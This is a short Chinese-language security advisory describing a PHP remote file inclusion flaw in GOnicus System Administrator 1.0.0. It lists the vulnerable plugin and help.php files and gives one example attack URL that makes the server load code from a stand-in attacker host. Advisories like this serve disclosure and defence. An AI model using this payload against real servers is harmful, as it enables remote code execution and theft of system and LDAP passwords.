涉及程序: GOnicus System Administrator 1.0.0版 描述: GOnicus System Administrator 存在PHP注入缺陷 详细: GOnicus System Administrator是一款PHP管理工具,用于管理LDAP数据库的帐户和系统。远程攻击者能在GOnicus System Administrator中注入任意PHP代码,通过更改几个变量,攻击者能在WEB服务器上执行任意代码。 通过安置plugin变量到下列文档,攻击者能添加并执行远程文件: plugins/3fax/1blocklists/index.php plugins/2administration/6departamentadmin/index.php plugins/2administration/5terminals/index.php plugins/2administration/4mailinglists/index.php plugins/2administration/3departaments/index.php plugins/2administration/2groupd/index.php 在help.php中也存在类似问题,攻击者能放置基础变量并添加远程文件。 利用该缺陷能使远程攻击者在WEB服务器上执行任意代码和命令,甚至能导致权限提升。攻击者还能调试httpd子程序,并获得用户的隐秘信息,如:系统密码,LDAP密码等。 攻击方法: 示例代码: http://target.server/include/help.php?base=http://attackers.server/ 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.gonicus.de